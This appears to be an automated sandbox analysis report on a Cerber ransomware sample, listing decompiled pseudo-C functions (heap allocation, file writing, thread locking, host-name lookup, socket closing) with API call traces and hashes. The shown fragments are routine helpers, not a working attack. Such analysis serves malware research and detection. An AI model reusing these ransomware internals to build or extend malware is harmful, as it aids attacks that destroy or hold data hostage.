                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t27 = __edi;
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_t29 = __eax;
                                                                                                                                                                                        				_v8 = GetLastError();
                                                                                                                                                                                        				if(E0040521D() == 0) {
                                                                                                                                                                                        					E004052DB(_t22);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					SetLastError(_v8);
                                                                                                                                                                                        					return _t20;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t32 = E004051F5(_t22, _t29 + 2);
                                                                                                                                                                                        					_t35 = _t27;
                                                                                                                                                                                        					if(_t27 == 0) {
                                                                                                                                                                                        						L9:
                                                                                                                                                                                        						_t4 = _t32 + 0xc; // 0xc
                                                                                                                                                                                        						_t12 = RtlAllocateHeap( *0x42f808, 8, _t4);
                                                                                                                                                                                        						L10:
                                                                                                                                                                                        						__eflags = _t12;
                                                                                                                                                                                        						if(_t12 != 0) {
                                                                                                                                                                                        							_t20 = E00405329(_t12, _t32);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_push(_t27);
                                                                                                                                                                                        					if(E0040522F(0, _t32, _t35) == 0) {
                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t32 > E004053C6(_t27)) {
                                                                                                                                                                                        						_t17 = _t27 - 8;
                                                                                                                                                                                        						__eflags = _t17;
                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t3 = _t32 + 0xc; // 0xc
                                                                                                                                                                                        						_t12 = RtlReAllocateHeap( *0x42f808, 8, _t17, _t3);
                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t20 = _t27;
                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
                                                                                                                                                                                          • Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D
                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
                                                                                                                                                                                          • Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
                                                                                                                                                                                          • Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C
                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(00000008,?,0000000C), ref: 0040542D
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000000C), ref: 00405441
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AllocateCurrentErrorLastProcess$CreateInformation
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2700697227-0
                                                                                                                                                                                        • Opcode ID: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
                                                                                                                                                                                        • Instruction ID: 60861b4cb21ab03a9d491da3f7eb1cca335a308e405506aebc7ad154f13da930
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
                                                                                                                                                                                        • Instruction Fuzzy Hash: A101A131600E019BDB217BA5AC85BAB73A8DB00745744007FE801BA2D2EBB99C895E5C
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                        			E00402522(void* __ecx, long __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				long _t20;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t31 = __eflags;
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                        				E00404CDC();
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				_push(0x42fbc8);
                                                                                                                                                                                        				_push(E0040591C( &E0040D170, 9, 0x3298a9eb));
                                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                                        				if(E00405B0C(0, __ecx, __edi, __esi, _t31) != 0) {
                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                        					_t25 = CreateFileW(_v8, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                        						if(WriteFile(_t25, _a8, __edi,  &_v12, 0) != 0 && __edi == _v12) {
                                                                                                                                                                                        							_t20 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						FlushFileBuffers(_t25);
                                                                                                                                                                                        						CloseHandle(_t25);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(0042FBC8,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000), ref: 00404CE8
                                                                                                                                                                                          • Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(0042FBC8,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
                                                                                                                                                                                          • Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(0042FBC8,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,0042FDD0,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040256C
                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402583
                                                                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 00402595
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000000C8), ref: 0040259C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Create$AttributesBuffersCloseDirectoryFlushHandlePathRootSkipWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1235120676-0
                                                                                                                                                                                        • Opcode ID: d437232638390c0ba0631372b31982ea3e96c4a6a7e581e09a36093f75ecfaa2
                                                                                                                                                                                        • Instruction ID: 1381f6fc85793e5c8f5f04911c0c0407d55afb8d8fa61240edf39063a8e535f6
                                                                                                                                                                                        • Opcode Fuzzy Hash: d437232638390c0ba0631372b31982ea3e96c4a6a7e581e09a36093f75ecfaa2
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE01D4B55411187FEB206BA5DD8BEDF3B2CDF04354F100576F901B21D1E6B99E058AAC
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                        			E004049F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0x10);
                                                                                                                                                                                        				_push(0x40d9d8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t25 = __ecx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t26 - 0x1c)) = 0;
                                                                                                                                                                                        				 *(_t26 - 0x20) = GetLastError();
                                                                                                                                                                                        				 *(_t26 - 4) = 0;
                                                                                                                                                                                        				if(E004049E4(_t25) == 0) {
                                                                                                                                                                                        					 *0x40f1d8(_t25 + 8);
                                                                                                                                                                                        					 *_t25 = GetCurrentProcessId();
                                                                                                                                                                                        					 *((intOrPtr*)(_t25 + 4)) = 0;
                                                                                                                                                                                        					 *((intOrPtr*)(_t26 - 0x1c)) = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t26 - 0x20));
                                                                                                                                                                                        				return E0040B68F( *((intOrPtr*)(_t26 - 0x1c)));
                                                                                                                                                                                        			}






                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentErrorLastProcess$CriticalInitializeSection
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 666570305-0
                                                                                                                                                                                        • Opcode ID: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
                                                                                                                                                                                        • Instruction ID: 6239d71e1b6d1d9b6d3a873080a6ec753aa0bdfafe20bcce74541f407a615959
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
                                                                                                                                                                                        • Instruction Fuzzy Hash: EDF01DB5C00205DBCB20EF65D90969EBBB0BF84310F10457BE551B36A0CB790945CF49
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                                                        			E00404ABB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                        				_push(0x40d9f8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                        				 *(_t23 - 0x1c) = GetLastError();
                                                                                                                                                                                        				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                                                                                                                                                                                        				_t11 = E004049E4(_t22);
                                                                                                                                                                                        				_t25 = _t11;
                                                                                                                                                                                        				if(_t11 != 0 || E004049F6(__ebx, _t22, __edi, _t22, _t25) != 0) {
                                                                                                                                                                                        					 *0x40f1dc(_t22 + 8);
                                                                                                                                                                                        					 *((intOrPtr*)(_t22 + 4)) = GetCurrentThreadId();
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t23 - 0x1c));
                                                                                                                                                                                        				return E0040B68F(_t14);
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9F8,0000000C,00405854,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A69
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00404A90
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00404A96
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404AAF
                                                                                                                                                                                          • Part of subcall function 004049F6: GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
                                                                                                                                                                                          • Part of subcall function 004049F6: RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
                                                                                                                                                                                          • Part of subcall function 004049F6: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
                                                                                                                                                                                          • Part of subcall function 004049F6: SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$Current$CriticalProcessSection$EnterInitializeThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2985312556-0
                                                                                                                                                                                        • Opcode ID: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
                                                                                                                                                                                        • Instruction ID: ed2fb18bf2bb44b178cf3cceb23bf943281626dd3940bfcf2b284636644175bb
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF082B4940302DBCB20BBB1DD0965E7764AF44315F20897FA922B65E0CB3D4A46DF5D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E00404AC0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                        				_push(0x40d9c8);
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                        				 *(_t22 - 0x1c) = GetLastError();
                                                                                                                                                                                        				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                                                                                                        				if(E004049E4(_t20) != 0) {
                                                                                                                                                                                        					if( *(_t20 + 4) == GetCurrentThreadId()) {
                                                                                                                                                                                        						 *(_t20 + 4) =  *(_t20 + 4) & 0x00000000;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t12 =  *0x40f1e4(_t20 + 8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                                                                                                        				SetLastError( *(_t22 - 0x1c));
                                                                                                                                                                                        				return E0040B68F(_t12);
                                                                                                                                                                                        			}






                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLastError.KERNEL32(0040D9C8,0000000C,004058FD,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404ACE
                                                                                                                                                                                          • Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00404AE6
                                                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00404AF9
                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404B0F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CurrentErrorLast$CriticalLeaveProcessSectionThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00405693: lstrlen.KERNEL32(00000000,00405705,?,00000000), ref: 0040569B
                                                                                                                                                                                        • FindMimeFromData.URLMON(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0040855A
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000030), ref: 00408577
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DataFindFromMimelstrcmpilstrlen
                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: gethostbynameinet_addr
                                                                                                                                                                                        • String ID: Cu@
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • shutdown.WS2_32(av@,00000002), ref: 0040556E
                                                                                                                                                                                        • closesocket.WS2_32(?), ref: 00405578
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: closesocketshutdown
                                                                                                                                                                                        • String ID: av@
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%